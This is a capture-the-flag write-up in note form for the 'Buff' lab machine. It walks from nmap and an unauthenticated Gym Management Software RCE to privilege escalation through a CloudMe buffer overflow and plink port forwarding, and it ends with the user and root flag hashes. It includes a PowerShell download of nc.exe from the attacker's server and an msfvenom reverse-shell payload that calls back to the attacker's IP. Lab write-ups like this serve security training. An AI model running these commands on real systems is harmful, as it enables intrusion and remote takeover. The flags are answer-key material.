buff
nmap
nmap shows the only service running is http on port 8080
gym management software 1.0
navigating through the web server's contact.php page, there is a note that Buff's webserver uses Gym Management Software 1.0 to run its webserver.Googling Gym Management Software returns an Unauthenticated Remote Code Execution vulnerability
unauthenticated RCE exploit
we can look up the exploit locally using searchsploit and the exploit database ID number
python gym_software_exploit.py http://10.10.10.198:8080/ <- don't forget the trailing backslash
we have a foothold!
But since the shell is limited, lets call a fully functional shell back to our attack machine
reverse shell
An easy way to do that is to have our victim download netcat for windows and execute it remotely to call a shell back to usfirst locate nc.exe and mv it to your working directory and spin up an http server
and have our victim download it
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.13/nc.exe','C:\xampp\htdocs\gym\upload\nc.exe')
privesc w/ Cloud_1112.exe
looking at our owned user shaun's download folder we see an interesting executable named CloudMe_1112.exesearchsploit CloudMe
we'll choose the first exploit and mirror it to our directory with searchsploit -m windows/remote/48389
generate shell code
since the buffer overflow is mostly already written for us, all we need to do is tweak the shellcode that will call back to our attack machinemsfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.62 4444' -f py -b '/x00/x0a/x0d' -v payload
now sub out 48389's shellcode with our msfvenom generated shellcode
plink
we want to forward our port to the victim box so we can run the exploit locally on our attacking machine since BUFF does not support pythonfirst download plink to our windows victim with a powershell downloadfile cmd
plink.exe -l st0ve -pw 12345 10.10.14.62 -R 8888:127.0.0.1:8888
+
reverse shell
make sure you set up your listener from user st0ve since thats what our victim is plinked towe run our exploit which attacks oour localhost (127.0.0.1 on port 8888 which forwards to Buff's port 8888)and....
we're root
user/root
29a8c6e451149cf2499ebabeb7aec7d4
d8f697cf088291568ccf206c16ea3b49